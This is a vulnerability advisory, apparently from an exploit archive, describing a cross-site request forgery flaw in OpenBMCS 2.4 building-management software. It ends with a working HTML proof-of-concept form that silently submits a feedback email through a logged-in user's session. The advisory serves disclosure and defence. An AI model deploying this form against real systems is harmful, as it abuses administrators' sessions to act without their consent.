OpenBMCS 2.4 Cross Site Request Forgery

OpenBMCS version 2.4 suffers from a cross site request forgery vulnerability.


MD5 | 84ffa1edfe22771f2bb7cb564470dfd0


OpenBMCS 2.4 CSRF Send E-mail


Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4

Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2022-5691
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php


26.10.2021

--


<html>
<body>
<form action="https://192.168.1.222/core/sendFeedback.php" method="POST">
<input type="hidden" name="subject" value="FEEDBACK%20TESTINGUS" />
<input type="hidden" name="message" value="Take me to your leader." />
<input type="hidden" name="email" value="[email protected]" />
<input type="submit" value="Send" />
</form>
</body>
</html>

Related Posts